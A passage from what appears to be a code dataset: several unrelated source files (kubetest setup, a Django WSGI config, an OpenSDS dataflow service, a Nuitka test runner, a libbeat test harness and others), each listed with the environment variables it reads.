func prepareAws(o *options) error {
// gcloud creds may have changed
if err := activateServiceAccount(o.gcpServiceAccount); err != nil {
return err
}
return control.FinishRunning(exec.Command("pip", "install", "awscli"))
}
// Activate GOOGLE_APPLICATION_CREDENTIALS if set or do nothing.
func activateServiceAccount(path string) error {
if path == "" {
return nil
}
return control.FinishRunning(exec.Command("gcloud", "auth", "activate-service-account", "--key-file="+path))
}
// Make all artifacts world readable.
// The root user winds up owning the files when the container exists.
// Ensure that other users can read these files at that time.
func chmodArtifacts() error {
return control.FinishRunning(exec.Command("chmod", "-R", "o+r", artifacts))
}
func prepare(o *options) error {
if err := util.MigrateOptions([]util.MigratedOption{
{
Env: "KUBERNETES_PROVIDER",
Option: &o.provider,
Name: "--provider",
},
{
Env: "CLUSTER_NAME",
Option: &o.cluster,
Name: "--cluster",
},
}); err != nil {
return err
}
if err := prepareGinkgoParallel(&o.ginkgoParallel); err != nil {
return err
}
switch o.provider {
case "gce", "gke", "node":
if err := prepareGcp(o); err != nil {
return err
}
case "aws":
if err := prepareAws(o); err != nil {
return err
}
}
if o.kubemark {
if err := util.MigrateOptions([]util.MigratedOption{
{
Env: "KUBEMARK_NUM_NODES",
Option: &o.kubemarkNodes,
Name: "--kubemark-nodes",
},
{
Env: "KUBEMARK_MASTER_SIZE",
Option: &o.kubemarkMasterSize,
Name: "--kubemark-master-size",
},
}); err != nil {
return err
}
}
if err := os.MkdirAll(artifacts, 0777); err != nil { // Create artifacts
return err
}
return nil
}
type ginkgoParallelValue struct {
v int // 0 == not set (defaults to 1)
}
func (v *ginkgoParallelValue) IsBoolFlag() bool {
return true
}
func (v *ginkgoParallelValue) String() string {
if v.v == 0 {
return "1"
}
return strconv.Itoa(v.v)
}
func (v *ginkgoParallelValue) Set(s string) error {
if s == "" {
v.v = 0
return nil
}
if s == "true" {
v.v = defaultGinkgoParallel
return nil
}
p, err := strconv.Atoi(s)
if err != nil {
return fmt.Errorf("--ginkgo-parallel must be an integer, found %q", s)
}
if p < 1 {
return fmt.Errorf("--ginkgo-parallel must be >= 1, found %d", p)
}
v.v = p
return nil
}
func (v *ginkgoParallelValue) Type() string {
return "ginkgoParallelValue"
}
func (v *ginkgoParallelValue) Get() int {
if v.v == 0 {
return 1
}
return v.v
}
var _ flag.Value = &ginkgoParallelValue{}
// Hand migrate this option. GINKGO_PARALLEL => GINKGO_PARALLEL_NODES=25
func prepareGinkgoParallel(v *ginkgoParallelValue) error {
if p := os.Getenv("GINKGO_PARALLEL"); strings.ToLower(p) == "y" {
log.Printf("Please use kubetest --ginkgo-parallel (instead of deprecated GINKGO_PARALLEL=y)")
if err := v.Set("true"); err != nil {
return err
}
os.Unsetenv("GINKGO_PARALLEL")
}
if p := os.Getenv("GINKGO_PARALLEL_NODES"); p != "" {
log.Printf("Please use kubetest --ginkgo-parallel=%s (instead of deprecated GINKGO_PARALLEL_NODES=%s)", p, p)
if err := v.Set(p); err != nil {
return err
}
}
os.Setenv("GINKGO_PARALLEL_NODES", v.String())
return nil
}
func publish(pub string) error {
v, err := ioutil.ReadFile("version")
if err != nil {
return err
}
log.Printf("Set %s version to %s", pub, string(v))
return gcsWrite(pub, v)
}
| [
"\"WORKSPACE\"",
"\"JOB_NAME\"",
"\"KUBETEST_IN_DOCKER\"",
"\"ARTIFACTS\"",
"\"KUBE_OS_DISTRIBUTION\"",
"\"KUBEMARK_BAZEL_BUILD\"",
"\"GINKGO_PARALLEL\"",
"\"GINKGO_PARALLEL_NODES\""
] | [] | [
"KUBEMARK_BAZEL_BUILD",
"ARTIFACTS",
"JOB_NAME",
"KUBETEST_IN_DOCKER",
"GINKGO_PARALLEL",
"GINKGO_PARALLEL_NODES",
"WORKSPACE",
"KUBE_OS_DISTRIBUTION"
] | [] | ["KUBEMARK_BAZEL_BUILD", "ARTIFACTS", "JOB_NAME", "KUBETEST_IN_DOCKER", "GINKGO_PARALLEL", "GINKGO_PARALLEL_NODES", "WORKSPACE", "KUBE_OS_DISTRIBUTION"] | go | 8 | 0 | |
rc_server/wsgi.py | """
WSGI config for rc_server project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "rc_server.settings")
application = get_wsgi_application()
path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
if path not in sys.path:
sys.path.append(path)
'''
https://stackoverflow.com/questions/36210686/importerror-no-module-named-mysite-settings-django/36211423
Daphne gets error: ImportError: No module named 'rc_car.settings'
'''
| [] | [] | [] | [] | [] | python | 0 | 0 | |
cmd/bogglehttpd/bogglehttpd.go | package main
import (
"log"
"os"
"github.com/DavidNix/boggle/server"
)
func main() {
port := os.Getenv("PORT")
log.Println("starting server on port", port, "...")
err := server.ListenAndServe(port)
if err != nil {
log.Fatalln("server failed", err)
}
}
| [
"\"PORT\""
] | [] | [
"PORT"
] | [] | ["PORT"] | go | 1 | 0 | |
dataflow/pkg/service.go | // Copyright 2019 The OpenSDS Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package pkg
import (
"context"
"encoding/json"
"errors"
"fmt"
"os"
"strings"
"github.com/opensds/multi-cloud/dataflow/pkg/db"
"github.com/opensds/multi-cloud/dataflow/pkg/job"
"github.com/opensds/multi-cloud/dataflow/pkg/kafka"
"github.com/opensds/multi-cloud/dataflow/pkg/model"
"github.com/opensds/multi-cloud/dataflow/pkg/plan"
"github.com/opensds/multi-cloud/dataflow/pkg/policy"
"github.com/opensds/multi-cloud/dataflow/pkg/utils"
. "github.com/opensds/multi-cloud/dataflow/pkg/utils"
pb "github.com/opensds/multi-cloud/dataflow/proto"
log "github.com/sirupsen/logrus"
)
type dataflowService struct{}
func NewDataFlowService() pb.DataFlowHandler {
host := os.Getenv("DB_HOST")
dbstor := Database{Credential: "unkonwn", Driver: "mongodb", Endpoint: host}
db.Init(&dbstor)
addrs := []string{}
config := strings.Split(os.Getenv("KAFKA_ADVERTISED_LISTENERS"), ";")
for i := 0; i < len(config); i++ {
addr := strings.Split(config[i], "//")
if len(addr) != 2 {
log.Info("Invalid addr:", config[i])
} else {
addrs = append(addrs, addr[1])
}
}
kafka.Init(addrs)
return &dataflowService{}
}
func policyModel2Resp(policy *model.Policy) *pb.Policy {
return &pb.Policy{
Id: policy.Id.Hex(),
Name: policy.Name,
Description: policy.Description,
Tenant: policy.TenantId,
UserId: policy.UserId,
Schedule: &pb.Schedule{
Type: policy.Schedule.Type,
TiggerProperties: policy.Schedule.TriggerProperties,
},
}
}
func (b *dataflowService) GetPolicy(ctx context.Context, in *pb.GetPolicyRequest, out *pb.GetPolicyResponse) error {
log.Info("Get policy is called in dataflow service.")
id := in.GetId()
if id == "" {
return errors.New("No id provided.")
}
p, err := policy.Get(ctx, id)
if err != nil {
return err
}
out.Policy = policyModel2Resp(p)
//For debug -- begin
jsons1, errs1 := json.Marshal(out)
if errs1 != nil {
log.Infof(errs1.Error())
} else {
log.Infof("jsons1: %s.\n", jsons1)
}
//For debug -- end
return err
}
func (b *dataflowService) ListPolicy(ctx context.Context, in *pb.ListPolicyRequest, out *pb.ListPolicyResponse) error {
log.Info("List policy is called in dataflow service.")
pols, err := policy.List(ctx)
if err != nil {
log.Infof("List policy err:%s.", err)
return nil
}
for _, p := range pols {
out.Policies = append(out.Policies, policyModel2Resp(&p))
}
//For debug -- begin
jsons1, errs1 := json.Marshal(out)
if errs1 != nil {
log.Infof(errs1.Error())
} else {
log.Infof("jsons1: %s.\n", jsons1)
}
//For debug -- end
return err
}
func (b *dataflowService) CreatePolicy(ctx context.Context, in *pb.CreatePolicyRequest,
out *pb.CreatePolicyResponse) error {
log.Info("Create policy is called in dataflow service.")
pol := model.Policy{}
pol.Name = in.Policy.GetName()
pol.Description = in.Policy.GetDescription()
if in.Policy.GetSchedule() != nil {
pol.Schedule.Type = in.Policy.Schedule.Type
pol.Schedule.TriggerProperties = in.Policy.Schedule.TiggerProperties
} else {
out.Err = "get schedule failed"
return errors.New("get schedule failed")
}
if pol.Name == "" {
out.Err = "no name provided."
return errors.New("et schedule failed")
}
pol.TenantId = in.Policy.TenantId
pol.UserId = in.Policy.UserId
log.Infof("dataflowservice CreatePolicy:%+v\n", pol)
p, err := policy.Create(ctx, &pol)
if err != nil {
log.Infof("create policy err:%s.", out.Err)
return nil
}
out.Policy = policyModel2Resp(p)
return nil
}
func (b *dataflowService) DeletePolicy(ctx context.Context, in *pb.DeletePolicyRequest, out *pb.DeletePolicyResponse) error {
log.Info("Delete policy is called in dataflow service.")
id := in.GetId()
if id == "" {
out.Err = "Get id failed."
return errors.New("Get id failed.")
}
err := policy.Delete(ctx, id)
if err == nil {
out.Err = ""
} else {
out.Err = err.Error()
}
log.Infof("Delete policy err:%s.", out.Err)
return err
}
func (b *dataflowService) UpdatePolicy(ctx context.Context, in *pb.UpdatePolicyRequest, out *pb.UpdatePolicyResponse) error {
log.Info("Update policy is called in dataflow service.")
policyId := in.GetPolicyId()
if policyId == "" {
return errors.New("no id provided.")
}
log.Infof("body:%s", in.GetBody())
updateMap := map[string]interface{}{}
if err := json.Unmarshal([]byte(in.GetBody()), &updateMap); err != nil {
return err
}
p, err := policy.Update(ctx, policyId, updateMap)
if err != nil {
log.Infof("Update policy finished, err:%s", err)
return err
}
out.Policy = policyModel2Resp(p)
return nil
}
func fillRspConnector(out *pb.Connector, in *model.Connector) {
switch in.StorType {
case model.STOR_TYPE_OPENSDS:
out.BucketName = in.BucketName
case model.STOR_TYPE_AWS_S3, model.STOR_TYPE_HW_OBS, model.STOR_TYPE_HW_FUSIONSTORAGE, model.STOR_TYPE_HW_FUSIONCLOUD,
model.STOR_TYPE_AZURE_BLOB, model.STOR_TYPE_CEPH_S3, model.STOR_TYPE_GCP_S3, model.STOR_TYPE_ALIBABA_OSS:
for i := 0; i < len(in.ConnConfig); i++ {
out.ConnConfig = append(out.ConnConfig, &pb.KV{Key: in.ConnConfig[i].Key, Value: in.ConnConfig[i].Value})
}
default:
log.Infof("Not support connector type:%v\n", in.StorType)
}
}
func planModel2Resp(plan *model.Plan) *pb.Plan {
resp := &pb.Plan{
Id: string(plan.Id.Hex()),
Name: plan.Name,
Description: plan.Description,
Type: plan.Type,
PolicyId: plan.PolicyId,
PolicyName: plan.PolicyName,
PolicyEnabled: plan.PolicyEnabled,
RemainSource: plan.RemainSource,
TenantId: plan.TenantId,
UserId: plan.UserId,
}
srcConn := pb.Connector{StorType: plan.SourceConn.StorType}
fillRspConnector(&srcConn, &plan.SourceConn)
destConn := pb.Connector{StorType: plan.DestConn.StorType}
fillRspConnector(&destConn, &plan.DestConn)
filter := pb.Filter{Prefix: plan.Filter.Prefix}
for _, t := range plan.Filter.Tag {
tag := &pb.KV{Key: t.Key, Value: t.Value}
filter.Tag = append(filter.Tag, tag)
}
resp.SourceConn = &srcConn
resp.DestConn = &destConn
resp.Filter = &filter
return resp
}
func (b *dataflowService) GetPlan(ctx context.Context, in *pb.GetPlanRequest, out *pb.GetPlanResponse) error {
log.Info("Get plan is called in dataflow service.")
id := in.GetId()
if id == "" {
errmsg := fmt.Sprint("no id specified.")
out.Err = errmsg
return errors.New(errmsg)
}
p, err := plan.Get(ctx, id)
if err != nil {
log.Infof("Get plan err:%s.", err)
return err
}
out.Plan = planModel2Resp(p)
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
log.Infof(errs.Error())
} else {
log.Infof("jsons1: %s.\n", jsons)
}
//For debug -- end
return err
}
func (b *dataflowService) ListPlan(ctx context.Context, in *pb.ListPlanRequest, out *pb.ListPlanResponse) error {
log.Info("List plans is called in dataflow service.")
if in.Limit < 0 || in.Offset < 0 {
msg := fmt.Sprintf("Invalid pagination parameter, limit = %d and offset = %d.", in.Limit, in.Offset)
log.Info(msg)
return errors.New(msg)
}
plans, err := plan.List(ctx, int(in.Limit), int(in.Offset), in.Filter)
if err != nil {
log.Infof("List plans err:%s.", err)
return err
}
for _, p := range plans {
out.Plans = append(out.Plans, planModel2Resp(&p))
}
out.Next = in.Offset + int32(len(plans))
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
log.Infof(errs.Error())
} else {
log.Infof("jsons1: %s.\n", jsons)
}
//For debug -- end
return err
}
func fillReqConnector(out *model.Connector, in *pb.Connector) error {
switch in.StorType {
case model.STOR_TYPE_OPENSDS:
out.BucketName = in.BucketName
return nil
case model.STOR_TYPE_AWS_S3, model.STOR_TYPE_HW_OBS, model.STOR_TYPE_HW_FUSIONSTORAGE, model.STOR_TYPE_HW_FUSIONCLOUD,
model.STOR_TYPE_AZURE_BLOB, model.STOR_TYPE_CEPH_S3, model.STOR_TYPE_GCP_S3, model.STOR_TYPE_IBM_COS, model.STOR_TYPE_ALIBABA_OSS:
for i := 0; i < len(in.ConnConfig); i++ {
out.ConnConfig = append(out.ConnConfig, model.KeyValue{Key: in.ConnConfig[i].Key, Value: in.ConnConfig[i].Value})
}
return nil
default:
log.Infof("Not support connector type:%v\n", in.StorType)
return errors.New("Invalid connector type.")
}
}
func (b *dataflowService) CreatePlan(ctx context.Context, in *pb.CreatePlanRequest, out *pb.CreatePlanResponse) error {
log.Info("Create plan is called in dataflow service.")
pl := model.Plan{}
pl.Name = in.Plan.GetName()
pl.Description = in.Plan.GetDescription()
pl.Type = in.Plan.GetType()
pl.RemainSource = in.Plan.GetRemainSource()
pl.PolicyId = in.Plan.GetPolicyId()
pl.PolicyEnabled = in.Plan.GetPolicyEnabled()
pl.UserId = in.Plan.UserId
pl.TenantId = in.Plan.TenantId
if in.Plan.GetSourceConn() != nil {
srcConn := model.Connector{StorType: in.Plan.SourceConn.StorType}
err := fillReqConnector(&srcConn, in.Plan.SourceConn)
if err == nil {
pl.SourceConn = srcConn
} else {
return err
}
} else {
out.Err = "get source connector failed"
return errors.New("invalid source connector")
}
if in.Plan.GetDestConn() != nil {
destConn := model.Connector{StorType: in.Plan.DestConn.StorType}
err := fillReqConnector(&destConn, in.Plan.DestConn)
if err == nil {
pl.DestConn = destConn
} else {
out.Err = err.Error()
return err
}
} else {
out.Err = "get destination connector failed"
return errors.New("invalid destination connector")
}
if in.Plan.GetFilter() != nil {
if in.Plan.Filter.Prefix != "" {
pl.Filter = model.Filter{Prefix: in.Plan.Filter.Prefix}
}
if len(in.Plan.Filter.Tag) > 0 {
for j := 0; j < len(in.Plan.Filter.Tag); j++ {
pl.Filter.Tag = append(pl.Filter.Tag, model.KeyValue{Key: in.Plan.Filter.Tag[j].Key, Value: in.Plan.Filter.Tag[j].Value})
}
}
}
if pl.Name == "" || pl.Type == "" {
out.Err = "Name or type is null."
return errors.New("Name or type is null.")
}
p, err := plan.Create(ctx, &pl)
if err != nil {
log.Infof("Create plan failed, err:%v", err)
return err
}
out.Plan = planModel2Resp(p)
return nil
}
func (b *dataflowService) DeletePlan(ctx context.Context, in *pb.DeletePlanRequest, out *pb.DeletePlanResponse) error {
log.Info("Delete plan is called in dataflow service.")
id := in.GetId()
if id == "" {
out.Err = "Get id failed."
return errors.New("Get id failed.")
}
err := plan.Delete(ctx, id)
if err == nil {
out.Err = ""
} else {
out.Err = err.Error()
}
log.Infof("Delete plan err:%s.", out.Err)
return err
}
func (b *dataflowService) UpdatePlan(ctx context.Context, in *pb.UpdatePlanRequest, out *pb.UpdatePlanResponse) error {
log.Info("Update plan is called in dataflow service.")
if in.GetPlanId() == "" {
return errors.New("No id provided.")
}
updateMap := map[string]interface{}{}
if err := json.Unmarshal([]byte(in.GetBody()), &updateMap); err != nil {
return err
}
p, err := plan.Update(ctx, in.GetPlanId(), updateMap)
if err != nil {
log.Infof("Update plan finished, err:%s.", err)
return err
}
out.Plan = planModel2Resp(p)
return nil
}
func (b *dataflowService) RunPlan(ctx context.Context, in *pb.RunPlanRequest, out *pb.RunPlanResponse) error {
log.Info("Run plan is called in dataflow service.")
tenantId, err := utils.GetTenantId(ctx)
if err != nil {
log.Errorf("run plan failed, err=%v\n", err)
return err
}
userId, err := utils.GetUserId(ctx)
if err != nil {
log.Errorf("run plan failed, err=%v\n", err)
return err
}
jid, err := plan.Run(in.Id, tenantId, userId)
if err == nil {
out.JobId = string(jid.Hex())
out.Err = ""
} else {
out.JobId = ""
out.Err = err.Error()
log.Infof("Run plan err:%s.", out.Err)
}
return err
}
func (b *dataflowService) GetJob(ctx context.Context, in *pb.GetJobRequest, out *pb.GetJobResponse) error {
log.Info("Get job is called in dataflow service.")
if in.Id == "" {
errmsg := fmt.Sprint("No id specified.")
out.Err = errmsg
return errors.New(errmsg)
}
jb, err := job.Get(ctx, in.Id)
if err != nil {
log.Infof("Get job err:%d.", err)
out.Err = err.Error()
return err
} else {
out.Job = &pb.Job{Id: string(jb.Id.Hex()), Type: jb.Type, PlanName: jb.PlanName, PlanId: jb.PlanId,
Description: "for test", SourceLocation: jb.SourceLocation, DestLocation: jb.DestLocation,
CreateTime: jb.CreateTime.Unix(), EndTime: jb.EndTime.Unix(), Status: jb.Status, TotalCapacity: jb.TotalCapacity,
PassedCapacity: jb.PassedCapacity, TotalCount: jb.TotalCount, PassedCount: jb.PassedCount, Progress: jb.Progress}
}
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
log.Infof(errs.Error())
} else {
log.Infof("jsons1: %s.\n", jsons)
}
//For debug -- end
return err
}
func (b *dataflowService) ListJob(ctx context.Context, in *pb.ListJobRequest, out *pb.ListJobResponse) error {
log.Info("List job is called in dataflow service.")
if in.Limit < 0 || in.Offset < 0 {
msg := fmt.Sprintf("invalid pagination parameter, limit = %d and offset = %d.", in.Limit, in.Offset)
log.Info(msg)
return errors.New(msg)
}
jobs, err := job.List(ctx, int(in.Limit), int(in.Offset), in.Filter)
if err != nil {
log.Infof("Get job err:%d.", err)
return err
}
if err == nil {
//for i := 0; i < len(jobs); i++ {
for _, job := range jobs {
//TODO: need change according to real scenario
j := pb.Job{Id: string(job.Id.Hex()), Type: job.Type, PlanName: job.PlanName, PlanId: job.PlanId,
SourceLocation: job.SourceLocation, DestLocation: job.DestLocation, StartTime: job.StartTime.Unix(),
CreateTime: job.CreateTime.Unix(), EndTime: job.EndTime.Unix(), Status: job.Status,
TotalCapacity: job.TotalCapacity, PassedCapacity: job.PassedCapacity, TotalCount: int64(job.TotalCount),
PassedCount: (int64(job.PassedCount)), Progress: int64(job.Progress)}
out.Jobs = append(out.Jobs, &j)
}
}
out.Next = in.Offset + int32(len(jobs))
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
log.Infof(errs.Error())
} else {
log.Infof("Got jobs: %s.\n", jsons)
}
//For debug -- end
return err
}
| [
"\"DB_HOST\"",
"\"KAFKA_ADVERTISED_LISTENERS\""
] | [] | [
"KAFKA_ADVERTISED_LISTENERS",
"DB_HOST"
] | [] | ["KAFKA_ADVERTISED_LISTENERS", "DB_HOST"] | go | 2 | 0 | |
tests/test-runners/run_all.py | #!/usr/bin/env python
# Copyright 2020, Kay Hayen, mailto:[email protected]
#
# Python test originally created or extracted from other peoples work. The
# parts from me are licensed as below. It is at least Free Software where
# it's copied from other people. In these cases, that will normally be
# indicated.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Test runners test
This shows that typical test runners like nose and py.test can be used with
compiled packages.
"""
import os
import sys
# Find nuitka package relative to us.
sys.path.insert(
0,
os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "..")
),
)
# isort:start
import subprocess
from nuitka.tools.testing.Common import getTempDir, my_print, setup
from nuitka.utils.FileOperations import copyTree
def main():
_python_version = setup()
os.chdir("subject")
nuitka_main_path = os.path.join("..", "..", "..", "bin", "nuitka")
tmp_dir = getTempDir()
command = [
os.environ["PYTHON"],
nuitka_main_path,
"--plugin-enable=pylint-warnings",
"--output-dir=%s" % tmp_dir,
"--follow-imports",
"--include-package=package",
"--nofollow-import-to=*.tests",
"--python-flag=-v",
"--debug",
"--module",
"package",
]
result = subprocess.call(command)
if result != 0:
sys.exit(result)
os.makedirs(os.path.join(tmp_dir, "package.ext"))
copyTree("package", os.path.join(tmp_dir, "package.ext/package"))
os.chdir(tmp_dir)
# We compile the package non-closed, so we can smuggle in tests
# and user code. This is going to be the example code.
with open("package.ext/package/user_provided.py", "w") as output:
# TODO: Maybe assert that the type name of a local function and one from
# the package are not the same, i.e. we are running inside the compiled
# package.
output.write(
"""
from __future__ import print_function
import package
print("__name__:", package.__name__)
print("__package__:", package.__package__)
print("__path__:", package.__path__)
print("__file__:", package.__file__)
# print("__loader__:", package.__loader__)
import package.sub_package1
print("__name__:", package.sub_package1.__name__)
print("__package__:", package.sub_package1.__package__)
print("__path__:", package.sub_package1.__path__)
print("__file__:", package.sub_package1.__file__)
# print("__loader__:", package.sub_package1.__loader__)
import package.sub_package1.tests;
print("__name__:", package.sub_package1.tests.__name__)
print("__package__:", package.sub_package1.tests.__package__)
print("__path__:", package.sub_package1.tests.__path__)
print("__file__:", package.sub_package1.tests.__file__)
# print("__loader__:", package.sub_package1.tests.__loader__)
"""
)
os.makedirs("nose")
with open("nose/usage.txt", "w") as output:
pass
os.system("find | sort")
# Inform about the extra path, format is NUITKA_PACKAGE_fullname where
# dots become "_" and should point to the directory where external code
# to be loaded will live under. Probably should be an absolute path, but
# we avoid it here.
os.environ["NUITKA_PACKAGE_package"] = "./package.ext/package"
# Lets make sure these to not work. These will be used in the compiled
# form only.
for module_path in ("__init__.py", "sub_package1__init__.py"):
with open(os.path.join("./package.ext/package", module_path), "w") as output:
output.write("assert False")
# Check the compiled package is functional for importing.
my_print("Running package as basic test:")
command = [os.environ["PYTHON"], "-c", "import package"]
result = subprocess.call(command)
if result != 0:
sys.exit(result)
my_print("Running nose tests:")
# assert os.system(os.environ["PYTHON"] + " -m nose --first-package-wins -s package.sub_package1.tests") == 0
my_print("Running py.test tests:")
command = [
os.environ["PYTHON"],
"-m",
"pytest",
"-v",
"--pyargs",
"package.sub_package1.tests",
]
result = subprocess.call(command)
if result != 0:
sys.exit(result)
if __name__ == "__main__":
main()
| [] | [] | [
"PYTHON",
"NUITKA_PACKAGE_package"
] | [] | ["PYTHON", "NUITKA_PACKAGE_package"] | python | 2 | 0 | |
packages/pyre/shells/User.py | # -*- coding: utf-8 -*-
#
# michael a.g. aïvázis
# orthologue
# (c) 1998-2022 all rights reserved
#
# externals
import os
import pyre
# declaration
class User(pyre.component):
"""
Encapsulation of user specific information
"""
# configurable state
# administrative
name = pyre.properties.str()
name.doc = 'the full name of the user'
username = pyre.properties.str()
username.default = os.environ.get('LOGNAME')
username.doc = "the username"
uid = pyre.properties.str()
uid.default = os.getuid()
uid.doc = "the user's system id"
home = pyre.properties.path()
home.default = os.environ.get('HOME')
home.doc = "the location of the user's home directory"
email = pyre.properties.str()
email.doc = 'the email address of the user'
affiliation = pyre.properties.str()
affiliation.doc = 'the affiliation of the user'
# choices and defaults
externals = pyre.externals.dependencies()
externals.doc = 'the database of preferred instances for each external package category'
# end of file
| [] | [] | [
"LOGNAME",
"HOME"
] | [] | ["LOGNAME", "HOME"] | python | 2 | 0 | |
internal/examples/fake/fake.go | // Copyright 2020 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package fake
import (
"context"
"fmt"
"log"
"os"
translate "cloud.google.com/go/translate/apiv3"
translatepb "google.golang.org/genproto/googleapis/cloud/translate/v3"
)
// TranslateTextWithConcreteClient translates text to the targetLang using the
// provided client.
func TranslateTextWithConcreteClient(client *translate.TranslationClient, text string, targetLang string) (string, error) {
ctx := context.Background()
log.Printf("Translating %q to %q", text, targetLang)
req := &translatepb.TranslateTextRequest{
Parent: fmt.Sprintf("projects/%s/locations/global", os.Getenv("GOOGLE_CLOUD_PROJECT")),
TargetLanguageCode: "en-US",
Contents: []string{text},
}
resp, err := client.TranslateText(ctx, req)
if err != nil {
return "", fmt.Errorf("unable to translate text: %v", err)
}
translations := resp.GetTranslations()
if len(translations) != 1 {
return "", fmt.Errorf("expected only one result, got %d", len(translations))
}
return translations[0].TranslatedText, nil
}
| [
"\"GOOGLE_CLOUD_PROJECT\""
] | [] | [
"GOOGLE_CLOUD_PROJECT"
] | [] | ["GOOGLE_CLOUD_PROJECT"] | go | 1 | 0 | |
libbeat/tests/system/beat/beat.py | import subprocess
import jinja2
import unittest
import os
import shutil
import json
import signal
import sys
import time
import yaml
from datetime import datetime, timedelta
from .compose import ComposeMixin
BEAT_REQUIRED_FIELDS = ["@timestamp",
"beat.name", "beat.hostname", "beat.version"]
INTEGRATION_TESTS = os.environ.get('INTEGRATION_TESTS', False)
class TimeoutError(Exception):
pass
class Proc(object):
"""
Slim wrapper on subprocess.Popen that redirects
both stdout and stderr to a file on disk and makes
sure to stop the process and close the output file when
the object gets collected.
"""
def __init__(self, args, outputfile):
self.args = args
self.output = open(outputfile, "ab")
self.stdin_read, self.stdin_write = os.pipe()
def start(self):
if sys.platform.startswith("win"):
self.proc = subprocess.Popen(
self.args,
stdin=self.stdin_read,
stdout=self.output,
stderr=subprocess.STDOUT,
bufsize=0,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
else:
self.proc = subprocess.Popen(
self.args,
stdin=self.stdin_read,
stdout=self.output,
stderr=subprocess.STDOUT,
bufsize=0,
)
return self.proc
def kill(self):
if sys.platform.startswith("win"):
# proc.terminate on Windows does not initiate a graceful shutdown
# through the processes signal handlers it just kills it hard. So
# this sends a SIGBREAK. You cannot sends a SIGINT (CTRL_C_EVENT)
# to a process group in Windows, otherwise Ctrl+C would be
# sent.
self.proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
self.proc.terminate()
def wait(self):
try:
return self.proc.wait()
finally:
self.output.close()
def check_wait(self, exit_code=0):
actual_exit_code = self.wait()
assert actual_exit_code == exit_code, "Expected exit code to be %d, but it was %d" % (
exit_code, actual_exit_code)
return actual_exit_code
def kill_and_wait(self):
self.kill()
os.close(self.stdin_write)
return self.wait()
def check_kill_and_wait(self, exit_code=0):
self.kill()
os.close(self.stdin_write)
return self.check_wait(exit_code=exit_code)
def __del__(self):
# Ensure the process is stopped.
try:
self.proc.terminate()
self.proc.kill()
except:
pass
# Ensure the output is closed.
try:
self.output.close()
except:
pass
class TestCase(unittest.TestCase, ComposeMixin):
@classmethod
def setUpClass(self):
# Path to test binary
if not hasattr(self, 'beat_name'):
self.beat_name = "beat"
if not hasattr(self, 'beat_path'):
self.beat_path = "."
# Path to test binary
if not hasattr(self, 'test_binary'):
self.test_binary = os.path.abspath(self.beat_path + "/" + self.beat_name + ".test")
# Create build path
build_dir = self.beat_path + "/build"
self.build_path = build_dir + "/system-tests/"
# Start the containers needed to run these tests
self.compose_up()
@classmethod
def tearDownClass(self):
self.compose_down()
def run_beat(self,
cmd=None,
config=None,
output=None,
logging_args=["-e", "-v", "-d", "*"],
extra_args=[],
exit_code=None):
"""
Executes beat.
Waits for the process to finish before returning to
the caller.
"""
proc = self.start_beat(cmd=cmd, config=config, output=output,
logging_args=logging_args,
extra_args=extra_args)
if exit_code != None:
return proc.check_wait(exit_code)
return proc.wait()
def start_beat(self,
cmd=None,
config=None,
output=None,
logging_args=["-e", "-v", "-d", "*"],
extra_args=[]):
"""
Starts beat and returns the process handle. The
caller is responsible for stopping / waiting for the
Proc instance.
"""
# Init defaults
if cmd is None:
cmd = self.test_binary
if config is None:
config = self.beat_name + ".yml"
if output is None:
output = self.beat_name + ".log"
args = [cmd,
"-systemTest",
"-test.coverprofile",
os.path.join(self.working_dir, "coverage.cov"),
"-path.home", os.path.normpath(self.working_dir),
"-c", os.path.join(self.working_dir, config),
]
if logging_args:
args.extend(logging_args)
if extra_args:
args.extend(extra_args)
proc = Proc(args, os.path.join(self.working_dir, output))
proc.start()
return proc
def render_config_template(self, template_name=None,
output=None, **kargs):
# Init defaults
if template_name is None:
template_name = self.beat_name
template_path = "./tests/system/config/" + template_name + ".yml.j2"
if output is None:
output = self.beat_name + ".yml"
template = self.template_env.get_template(template_path)
kargs["beat"] = self
output_str = template.render(**kargs)
output_path = os.path.join(self.working_dir, output)
with open(output_path, "wb") as f:
os.chmod(output_path, 0o600)
f.write(output_str.encode('utf8'))
# Returns output as JSON object with flattened fields (. notation)
def read_output(self,
output_file=None,
required_fields=None):
# Init defaults
if output_file is None:
output_file = "output/" + self.beat_name
jsons = []
with open(os.path.join(self.working_dir, output_file), "r") as f:
for line in f:
if len(line) == 0 or line[len(line) - 1] != "\n":
# hit EOF
break
try:
jsons.append(self.flatten_object(json.loads(
line, object_pairs_hook=self.json_raise_on_duplicates), []))
except:
print("Fail to load the json {}".format(line))
raise
self.all_have_fields(jsons, required_fields or BEAT_REQUIRED_FIELDS)
return jsons
# Returns output as JSON object
